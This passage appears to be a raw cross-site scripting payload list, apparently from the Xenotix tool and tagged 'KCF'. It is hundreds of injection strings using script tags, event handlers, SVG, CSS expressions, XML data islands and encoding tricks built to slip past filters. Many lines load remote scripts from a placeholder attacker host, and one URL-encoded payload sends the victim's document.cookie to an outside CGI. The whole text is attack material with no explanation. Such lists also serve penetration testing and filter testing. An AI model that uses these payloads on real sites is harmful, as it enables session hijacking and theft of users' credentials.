SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT a=`>` SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT a=">'>" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT a=">" '' SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT a=">" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT "a='>'" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT a=`>` SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT a=">" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT <B>alert(1);</SCRIPT> "`'><script>%C2%85javascript:alert(1)</script> "`'><script>%C2%A0javascript:alert(1)</script> <script charset="%22>javascript:alert(1)</script> <script charset='utf-8'>alert(1)</script> <script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%25/.test(result)&&result.length) { ids.push(1); } </script> <script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%25/.test(result)&&result.length) { ids.push(1); } </script> <script //>//confirm('%FF41%FF4C%FF45%FF52%FF54%1455%FF11%1450')//</script // <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> <script> document.cookie='kcf'; if(document.cookie !== 'kcf') { alert(1,document.cookie); } </script> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> "`'><script>%E1%9A%80javascript:alert(1)</script> "`'><script>%E1%A0%8Ejavascript:alert(1)</script> "`'><script>%E2%80%80javascript:alert(1)</script> "`'><script>%E2%80%81javascript:alert(1)</script> "`'><script>%E2%80%82javascript:alert(1)</script> "`'><script>%E2%80%83javascript:alert(1)</script> "`'><script>%E2%80%84javascript:alert(1)</script> "`'><script>%E2%80%85javascript:alert(1)</script> "`'><script>%E2%80%86javascript:alert(1)</script> "`'><script>%E2%80%87javascript:alert(1)</script> "`'><script>%E2%80%88javascript:alert(1)</script> "`'><script>%E2%80%89javascript:alert(1)</script> "`'><script>%E2%80%8Ajavascript:alert(1)</script> "`'><script>%E2%80%8Bjavascript:alert(1)</script> "`'><script>%E2%80%A8javascript:alert(1)</script> "`'><script>%E2%80%A9javascript:alert(1)</script> "`'><script>%E2%80%AFjavascript:alert(1)</script> "`'><script>%E2%81%9Fjavascript:alert(1)</script> "`'><script>%E3%80%80javascript:alert(1)</script> "`'><script>%EF%BB%BFjavascript:alert(1)</script> "`'><script>%EF%BF%AEjavascript:alert(1)</script> "`'><script>%EF%BF%BEjavascript:alert(1)</script> <script>eval(‘a%006cert(1)’);</script> <script>eval(‘a\154ert(1)’);</script> <script>eval(‘a%6cert(1)’);</script> <script>eval(‘a\l\ert$1$’);</script> <script>eval(‘al’+’ert(1)’);</script> <script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script> <script>eval(String.fromCharCode(75,67,70));</script> <script>execScript(“MsgBox 1”,”vbscript”);</script> "`'><script>%F0%90%96%9Ajavascript:alert(1)</script> <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT> <script>function::[‘alert’](1)</script> <script> function a() {} </script> <img src=1 onerror="a();alert(1)"> <script>history.pushState(0,0,'/i/am/somewhere_else');</script> <script> if ('a'.trim() === '') { alert(1); } </script> <script>if("x\%E0%B9%92".length==2) { javascript:alert(1);}</script> <script>if("x\%E1%96%89".length==2) { javascript:alert(1);}</script> <script>if("x\%EE%A9%93".length==2) { javascript:alert(1);}</script> <script>if("x\".length==1) { alert(1);}</script> <script>if("x\".length==2) { alert(1);}</script> <script>if("xx" == "xx") { alert(1);}</script> </script><img/%00/src="worksinchrome&colon;prompt(1)"/%00/onerror='eval(src)'> <script itworksinallbrowsers>/<script /alert(1)</script <script>javascript:alert(1)<%00/script> <script>javascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> <script>javascript:alert(1)</script%0A <script>javascript:alert(1)</script%0B <script>javascript:alert(1)</script%0D ><script>KCF<\/script> "><script>KCF<\/script> \'><script>KCF<\/script> <SCRIPT/KCF SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT/KCF SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <script language='javascript' src='%25(jscript)s'></script> <script language=vbs>execScript(“alert(1)”)</script> <SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(“ALERT(1)”)) </SCRIPT> <script language=vbs>MsgBox 1</script> <SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT> <SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET> <script>Object.noSuchMethod = Function,[{}][0].constructor._('alert(1)')()</script> <script>Object.noSuchMethod = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <script onreadystatechange=alert(1)> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <script>%25(payload)s</script> <<SCRIPT>%25(payload)s//<</SCRIPT> <script>prompt(1)</script> ‘><script>prompt(1)</script> ‘/><script>prompt(1)</script> “<script>prompt(1)</script> “><script>prompt(1)</script> “/><script>prompt(1)</script> <ScRiPt+>prompt(1)</ScRiPt> <ScRIPt>prompt(1)</ScRIPt> ‘><ScRIPt>prompt(1)</ScRIPt> “><ScRIPt>prompt(1)</ScRIPt> <script>prompt(-[])</script> <script>ReferenceError.prototype.defineGetter('name', function(){alert(1)}),x</script> <script>ReferenceError.prototype.defineGetter('name', function(){javascript:alert(1)}),x</script> </script><script >alert(1)</script> </script><script>alert(KCF </SCRIPT>”><SCRIPT>alert(String.fromCharCode(75,67,70)) </script><script>alert(String.fromCharCode(75,67,70))</script> </SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT> SCRIPT>">'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT> ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> </script><script>prompt(1)</script> </SCRIPT>”><SCRIPT>prompt(1)</SCRIPT> </SCRIPT>”>”><SCRIPT>prompt(1)</SCRIPT> <script>({set//$($){_//setter=$,_=1}}).$=alert</script> <script>({set//$($){_//setter=$,_=javascript:alert(1)}}).$=eval</script> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)></script> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src="#">{alert(1)}</script>;1 <script src="data:,alert(1)"></script> <script src="data:%CB%8F,javascript:alert(1)"></script> <script/src="data&colon;text%2Fj%0061v%0061script,%0061lert('%0061')"></script a=%0061 & /=%2F <script/src=data&colon;text/j%0061v%0061&#115&#99&#114&#105&#112&#116,%0061%6C%65%72%74(/KCF/)></script <script/src=data&colon;text/j%0061v%0061&#115&#99&#114&#105&#112&#116,%0061%6C%65%72%74(/XSS/)></script <script src="data:%D4%8F,javascript:alert(1)"></script> <script src="data:%E0%A4%98,javascript:alert(1)"></script> <script src="data:text/javascript,alert(1)"></script> <script src="data:text/plain%2Cjavascript:alert(1)"></script> <script src="data:text/plain,alert(1)"></script> <script src="data:text/plainalert(1)"></script> <SCRIPT SRC=http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp< B > //|\\ <script //|\\ src='http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp'> //|\\ </script //|\\ <SCRIPT =">" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT SRC=http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp></SCRIPT> <SCRIPT/SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT> <SCRIPT SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.jpg"></SCRIPT> <SCRIPT SRC=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js< B > //|\\ <script //|\\ src='http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js'> //|\\ </script //|\\ <SCRIPT =">" SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <SCRIPT SRC=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js></SCRIPT> <SCRIPT/SRC="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></SCRIPT> <script src="javascript:alert(1)"> <SCRIPT SRC="%25(jpg)s"></SCRIPT> <SCRIPT SRC=%25(jscript)s?<B> <script src="/\%25(jscript)s"></script> <script src="\\%25(jscript)s"></script> <script src=%25(jscript)s></script> <SCRIPT/SRC="%25(jscript)s"></SCRIPT> <SCRIPT SRC=//XXXxenotixXXX:3555/xss_serve_payloads/.j> </script><svg onload='-/"/-alert(1)//'> <script/&Tab; src='http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script> <script/&Tab; src='http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js' /&Tab;></script> <script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script> <script type="text/javascript">alert(1);</script> <script type=text/javascript>alert(1)</script> <script type="text/javascript">window.open("http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html","_self");</script> <script> var a=1'; alert(1); </script> <script> var a = "kcf"; alert(1); </script> <script>var a = ‘</script><script>alert(1)</script> <script>var var = 1; alert(var)</script> <script> var x = "asdf\1 asdf"; alert(1); </script> <script> var x = "kcf\"; alert(1); </script> `'"><script>window['alert'](1)</script> <script>window.open( "http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html" )</script> <script x> alert(1) </script 1=2 <SCRIPT>x=/KCF/ alert(x.source)</SCRIPT> <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script> <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script> \'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=KCF> <script>x='<script><img src=xx:xx onerror=alert(1)>';</script> <ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script><script src=http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp> <ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script><script src=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js> <select autofocus onfocus=alert(1)> <select onfocus=javascript:alert(1) autofocus> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <SPAN DATASRC="#KCF" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> </style  ><script   :-(>//alert(document.location)//</script   :-( <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> ' style=abc:expression(KCF) ' \" style=abc:expression(KCF) \" <STYLE>BODY{-moz-binding:url("http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.xml#kcf")}</STYLE> <style><img src="</style><img src=x onerror=alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=prompt(1)//"> <STYLE>@import'%25(css)s';</STYLE> <style>@import "data:,%7bx:expression(javascript:alert(1))%7D";</style> <style>@import "data:,%7bx:expression(write(1))%7D";</style> <STYLE>@im\port'\ja\vasc\ript:alert(1)';</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("KCF")';</STYLE> <style>[{}@import'test.css?]{color: green;}</style>X <STYLE>.KCF{background-image:url("javascript:alert(1)");}</STYLE> <STYLE>.KCF{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=KCF></A> <STYLE>.KCF{background-image:url("javascript:alert('KCF')");}</STYLE><A CLASS=KCF></A> <STYLE>.KCF{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=KCF></A> <STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>KCF <STYLE>li {list-style-image: url("javascript:alert('KCF')");}</STYLE><UL><LI>KCF</br> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>KCF <STYLE>li {list-style-image: url("javascript:alert('KCF')");}</STYLE><UL><LI>KCF <style/onload=</style></script><script>alert("KCF")</script> '"--></style></script><script>prompt(1)</script> <///style///><span %2F onmousemove='alert(1)'>SPAN <style></style%09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style%0A<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style%0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style%20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style%3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style><img src="about:blank" onerror=alert(1)//></style> <style></script> <STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('KCF')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <STYLE TYPE="text/javascript">alert(1);</STYLE> <STYLE TYPE="text/javascript">alert('KCF');</STYLE> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <// style=x:expression\28javascript:alert(1)\29> <// style=x:expression\28write(1)\29> <style>{x:expression(write(1))}</style> <style>{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg> <svg contentScriptType=text/vbs><script>MsgBox+1 <svg/onload=alert(1) <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <sVg><scRipt %00>alert(1) {Opera} <sVg><scRipt %00>prompt(/ <svg><script ?>alert(1) <svg><script>alert(1)</script></svg> <svg><script>lo<sv>gChr(1)</script></svg> <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <svg><script x:href='http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp' <svg><script x:href='http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js' <svg><script xlink:href=data&colon;,window.open('https://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html')></script <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <svg><style><img/src=x onerror=alert(1)// </b> <svg><style>&ltimg src=x onerror=alert(1)&gt</svg> </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg> <TABLE BACKGROUND="javascript:alert(1)"> <table background="javascript:alert(1)"></table> <TABLE BACKGROUND="javascript:alert('KCF')"> <table background="javascript:javascript:alert(1)"> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:alert('KCF')"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <textarea autofocus onfocus=alert(1)> <textarea onfocus=javascript:alert(1) autofocus> <title>kcf<script>alert(1)</script></title> <title onpropertychange=alert(1)></title><title title=></title> <title onpropertychange=javascript:alert(1)></title><title title=> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> </TITLE><SCRIPT>alert(1);</SCRIPT> </TITLE><SCRIPT>alert("KCF");</SCRIPT> ></title><script>alert(KCF)</script>'"><marquee><h1>Kerala Cyber Force</h1></marquee> " type=image src=null onerror=KCF " \' type=image src=null onerror=KCF \' ?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e <var onmouseover="prompt(1)">KCF</var> <video onerror="javascript:alert(1)"><source> <video onerror="javascript:javascript:alert(1)"><source> <video poster=javascript:alert(1)//></video> <video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video> <video poster=javascript:javascript:alert(1)// <video><source onerror="alert(1)"> <video><source onerror="javascript:alert(1)"> <video><source onerror="javascript:javascript:alert(1)"> <video><source onerror="prompt(1)"> <video><source onerror="prompt(1)"></source></video> <video src=1 href=1 onerror="javascript:alert(1)"></video> <video src=1 onerror=alert(1)> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=%25(vml)s#kcf></vmlframe> X<form id=test><input></form><button form=test onformchange==javascript:alert(1)>X X<form id=test onforminput=javascript:alert(1)><input></form> <XML ID=0><I><B><IMG SRC="javascript:alert(1)"></B></I></XML> <XML ID=0><I><B><IMG SRC="javascript:alert(1)"></B></I></XML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <xml id="kcf" src="%25(htc)s"></xml> <label dataformatas="html" datasrc="#kcf" datafld="payload"></label> <xml id="kcf" src="test.htc"></xml><label dataformatas="html" datasrc="#kcf" datafld="payload"></label> <xml id="X"><a><b><script>alert(1);</script>;</b></a></xml> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <xml onreadystatechange=alert(1)> <xml> <rect style="height:100%25;width:100%25" id="kcf" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml> <xml src="javascript:alert(1);"> <?xml-stylesheet href="javascript:alert(1)"?><root/> <?xml-stylesheet type="text/css" href="data:,%7bx:expression(write(2));%7d"?> <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> <?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x> <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%25' </script> %25>/ alert(2) </script> XXX <style> ['{} {color:red}</style> <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script> <x style="background:url('x;color:red;/')">KCF</x> <x style="background:url('x[a];color:red;/*')">XXX</x> <x style=behavior:url(#default#time2) onbegin=alert(1)> <x style="behavior:url(%25(sct)s)"> <x style="behavior:url(test.sct)"> <x style=x:expression(alert(1))> X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >